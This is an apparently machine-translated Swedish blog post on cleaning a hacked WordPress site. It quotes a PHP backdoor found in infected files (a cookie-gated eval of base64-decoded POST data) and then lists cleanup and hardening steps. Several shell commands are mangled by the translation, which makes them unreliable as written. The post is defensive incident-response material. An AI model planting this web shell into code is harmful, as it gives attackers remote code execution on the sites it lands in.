WordPress Utnyttja - Rensa upp virusfiler, SQL och serversäkerhet.

Innan du läser detta inlägg, ska du se posta här, För att förstå någonting. :)

Jag hittade det i flera bloggfiler på stealthsettings.com, koder som liknar de nedan, som uppträdde som ett resultat av viruset med bedriften att WordPress.:

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

xmlrpcOm ovanstående är om filen xmlrpc.php från Sömniga, Vid en grep server, ser ut som en hel del av det här slaget i källkoder.

pppffiuuu

Rengöring infekterade filer:

Ooookkkk ...
1. Den bästa lösningen, eftersom det är gjort säkerhetskopieringOch rensade databasen är att torka filer WordPress (du kan behålla wp-config.php och filer som inte är strikt relaterade till wp-plattformen, efter att de har kontrollerats noggrant) från servern och ladda upp de ursprungliga från versionen 2.5.1 (Vid detta tillfälle och göra en versionsuppgradering wp :)) http://wordpress.org/download/ . Torka inklusive temafiler om du inte litar på att du kan kontrollera dem noga.

Det verkar ha påverkats och filer av de teman som inte har använts tidigare på bloggen och helt enkelt byta temat inte löser detta problem.

./andreea/wp-content/themes/default/index.php:

2. Sök och ta bort alla filer som innehåller:... * _new.php * _old.php * Jpgg * Giff * Pngg och wp-info.txt fil, om något.

hitta. -namn “* _new.php”
hitta. -namn “* _old.php”
hitta. -namn "* .jpgg"
hitta. -namn “* _giff”
hitta. -namn “* _pngg”
hitta. -namn “wp-info.txt”

3. i / Tmp , Söka och ta bort mappar som tmpYwbzT2

SQL Rengöring :

1. I tabellen tabellen wp_options Kontrollera och ta bort raderna: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Allt i wp_options, gå till active_plugins och ta bort om det finns en plugin som slutar i en av de förlängningar * _new.php * _old.php *. jpgg *. GIFF *. pngg eller om man misstänker en annan anknytning, kolla noga.

3. Bord wp_users, Se om det finns en användare som inte har skrivit något i sin högra, kolumnen user_nicename. Ta bort denna användare, men kom ihåg numret i ID-kolumnen. Den här användaren kommer sannolikt att använda "WordPress"Ca user_login och där det är skapat på 00: 00: 00 0000-00-00.

4. Gå till tabell wp_usermeta och ta bort alla rader som hör ID ovan.

När du har gjort denna SQL-rengöring, inaktivera och aktivera sedan eventuellt plugin. (i blogg -> Instrumentpanel -> Plugins)

Säkra server:

1. Se vilka kataloger och filer "skrivbar"(chmod 777) och försök att sätta en chmod som inte längre tillåter deras skrivande på någon nivå. (chmod 644, till exempel)

Sök. -Perm-2-ls

2. Se vad som är filer sattes bit suid eller SGID . Om du inte använder dessa filer sätta på dem chmod 0 eller avinstallera det paket som den innehåller. De är mycket farliga eftersom de utför privilegier "grupp"Eller"rot"Och inte med normala användarrättigheter för att köra den filen.

find /-type f-perm-04000-ls
find /-type f-perm-02000-ls

3. Kolla vilka portar är öppna och försöker stänga eller fästa de som inte används.

netstat-an | grep-i lyssnar

Så mycket. Jag ser Vissa bloggar är förbjudna de Google Search och andra säger "Han gjorde dem bra!!!" . Tja, jag skulle ha gjort det för dem...men vad säger man om Google börjar förbjuda alla platser formning  SE SPAM och satte trojan (Trojan.Clicker.HTML) i kakor?

Teknikentusiast, jag skriver med glädje på StealthSettings.com sedan 2006. Jag har omfattande erfarenhet av operativsystem: macOS, Windows och Linux, samt programmeringsspråk och bloggplattformar (WordPress) och för onlinebutiker (WooCommerce, Magento, PrestaShop).

Hur man » AntiVirus & säkerhet » WordPress Utnyttja - Rensa upp virusfiler, SQL och serversäkerhet.

1 tanke på "WordPress Exploit – Virusfilrensning, SQL och serversäkerhet.”

Lämna en kommentar